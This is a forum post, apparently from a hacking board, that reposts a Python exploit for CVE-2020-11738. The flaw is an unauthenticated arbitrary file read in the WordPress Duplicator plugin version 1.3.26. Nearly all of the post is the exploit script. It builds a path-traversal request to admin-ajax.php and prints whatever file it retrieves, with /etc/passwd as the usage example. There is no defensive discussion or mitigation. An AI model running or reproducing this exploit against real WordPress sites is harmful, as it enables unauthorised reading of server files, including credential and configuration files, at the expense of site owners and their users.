This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,702 With Us For: 243 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read # Date: October 16, 2021 # Exploit Author: nam3lum # Vendor Homepage: https://wordpress.org/plugins/duplicator/ # Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip] # Version: 1.3.26 # Tested on: Ubuntu 16.04 # CVE : CVE-2020-11738 import requests as re import sys if len(sys.argv) != 3: print("Exploit made by nam3lum.") print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd") exit() arg = sys.argv[1] file = sys.argv[2] URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file output = re.get(url = URL) print(output.text) Link to comment Share on other sites More sharing options...
Recommended Posts